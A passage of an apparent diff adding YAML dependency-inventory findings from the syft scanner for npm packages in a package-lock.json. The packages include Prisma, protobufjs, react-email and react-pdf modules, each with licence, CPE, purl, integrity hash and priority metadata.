compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 17f0b8bb58a0d4a7 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @prisma/fetch-engine 5.22.0' + title: '@prisma/fetch-engine 5.22.0' + description: 'Package discovered: @prisma/fetch-engine 5.22.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 373747b9463a5333 + name: '@prisma/fetch-engine' + version: 5.22.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40prisma/fetch-engine@5.22.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@prisma/fetch-engine/-/fetch-engine-5.22.0.tgz + integrity: sha512-bkrD/Mc2fSvkQBV5EpoFcZ87AvOgDxbG99488a5cexp5Ccny+UM6MAe/UFkUC0wLYD9+9befNOqGiIJhhq+HbA== + dependencies: + '@prisma/debug': 5.22.0 + '@prisma/engines-version': 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 + '@prisma/get-platform': 5.22.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d7f7c5d00389674a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @prisma/get-platform 5.22.0' + title: '@prisma/get-platform 5.22.0' + description: 'Package discovered: @prisma/get-platform 5.22.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 35191eb100a1fadc + name: '@prisma/get-platform' + version: 5.22.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40prisma/get-platform@5.22.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@prisma/get-platform/-/get-platform-5.22.0.tgz + integrity: sha512-pHhpQdr1UPFpt+zFfnPazhulaZYCUqeIcPpJViYoq9R+D/yw4fjE+CtnsnKzPYm0ddUbeXUzjGVGIRVgPDCk4Q== + dependencies: + '@prisma/debug': 5.22.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e931437e79a085b9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/aspromise 1.1.2' + title: '@protobufjs/aspromise 1.1.2' + description: 'Package discovered: @protobufjs/aspromise 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 503ecf3ae2d5a446 + name: '@protobufjs/aspromise' + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/aspromise:\@protobufjs\/aspromise:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/aspromise@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz + integrity: sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e4bf388f995dc845 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/base64 1.1.2' + title: '@protobufjs/base64 1.1.2' + description: 'Package discovered: @protobufjs/base64 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 493d13966d12b3a0 + name: '@protobufjs/base64' + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/base64:\@protobufjs\/base64:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/base64@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz + integrity: sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: fad1d6a5684086d4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/codegen 2.0.5' + title: '@protobufjs/codegen 2.0.5' + description: 'Package discovered: @protobufjs/codegen 2.0.5' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 12a6d95fe5a62fc1 + name: '@protobufjs/codegen' + version: 2.0.5 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/codegen:\@protobufjs\/codegen:2.0.5:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/codegen@2.0.5 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz + integrity: sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: efbb149e9a326e2c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/eventemitter 1.1.0' + title: '@protobufjs/eventemitter 1.1.0' + description: 'Package discovered: @protobufjs/eventemitter 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 7097fcb2aeb00411 + name: '@protobufjs/eventemitter' + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/eventemitter:\@protobufjs\/eventemitter:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/eventemitter@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz + integrity: sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 817b2c8a979dff10 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/fetch 1.1.0' + title: '@protobufjs/fetch 1.1.0' + description: 'Package discovered: @protobufjs/fetch 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4ed2c80c8ad8c116 + name: '@protobufjs/fetch' + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/fetch:\@protobufjs\/fetch:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/fetch@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz + integrity: sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ== + dependencies: + '@protobufjs/aspromise': ^1.1.1 + '@protobufjs/inquire': ^1.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 253d6aca6c381638 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/float 1.0.2' + title: '@protobufjs/float 1.0.2' + description: 'Package discovered: @protobufjs/float 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: dda6f1aef9d11e58 + name: '@protobufjs/float' + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/float:\@protobufjs\/float:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/float@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz + integrity: sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7699234b047c9f55 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/inquire 1.1.1' + title: '@protobufjs/inquire 1.1.1' + description: 'Package discovered: @protobufjs/inquire 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a8f805afd5f928e8 + name: '@protobufjs/inquire' + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/inquire:\@protobufjs\/inquire:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/inquire@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.1.tgz + integrity: sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0888dd200a4f8fb9 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/path 1.1.2' + title: '@protobufjs/path 1.1.2' + description: 'Package discovered: @protobufjs/path 1.1.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 742d5880151b22a5 + name: '@protobufjs/path' + version: 1.1.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/path:\@protobufjs\/path:1.1.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/path@1.1.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz + integrity: sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 37fb5baaf891bf3b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/pool 1.1.0' + title: '@protobufjs/pool 1.1.0' + description: 'Package discovered: @protobufjs/pool 1.1.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2f9166cf527d1f74 + name: '@protobufjs/pool' + version: 1.1.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/pool:\@protobufjs\/pool:1.1.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/pool@1.1.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz + integrity: sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 008b4e7e3539d471 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @protobufjs/utf8 1.1.1' + title: '@protobufjs/utf8 1.1.1' + description: 'Package discovered: @protobufjs/utf8 1.1.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: afb917b3027623df + name: '@protobufjs/utf8' + version: 1.1.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: BSD-3-Clause + spdxExpression: BSD-3-Clause + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@protobufjs\/utf8:\@protobufjs\/utf8:1.1.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40protobufjs/utf8@1.1.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz + integrity: sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b1e07271de6eec7b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-email/render 0.0.16' + title: '@react-email/render 0.0.16' + description: 'Package discovered: @react-email/render 0.0.16' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: e1894e7a0de3acac + name: '@react-email/render' + version: 0.0.16 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-email\/render:0.0.16:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_email\/render:0.0.16:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-email/render@0.0.16 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-email/render/-/render-0.0.16.tgz + integrity: sha512-wDaMy27xAq1cJHtSFptp0DTKPuV2GYhloqia95ub/DH9Dea1aWYsbdM918MOc/b/HvVS3w1z8DWzfAk13bGStQ== + dependencies: + html-to-text: 9.0.5 + js-beautify: ^1.14.11 + react-promise-suspense: 0.3.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 2e3b9f0f7d4d1d7f + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/fns 2.2.1' + title: '@react-pdf/fns 2.2.1' + description: 'Package discovered: @react-pdf/fns 2.2.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 38462ff4454997a0 + name: '@react-pdf/fns' + version: 2.2.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/fns@2.2.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-2.2.1.tgz + integrity: sha512-s78aDg0vDYaijU5lLOCsUD+qinQbfOvcNeaoX9AiE7+kZzzCo6B/nX+l48cmt9OosJmvZvE9DWR9cLhrhOi2pA== + dependencies: + '@babel/runtime': ^7.20.13 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 06f3ac6357300fe3 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/fns 3.1.3' + title: '@react-pdf/fns 3.1.3' + description: 'Package discovered: @react-pdf/fns 3.1.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4656650b2a6dd236 + name: '@react-pdf/fns' + version: 3.1.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/fns@3.1.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-3.1.3.tgz + integrity: sha512-0I7pApDr1/RLAKbizuLy/IHTEa93LSPy/bEwYniboC3Xqnp6Od8xFJKbKEzGw2wh/5zKFFwl00g4t9RwgIMc3w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 0e189b3633f52f28 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/font 2.5.2' + title: '@react-pdf/font 2.5.2' + description: 'Package discovered: @react-pdf/font 2.5.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 15064a64821e35da + name: '@react-pdf/font' + version: 2.5.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: 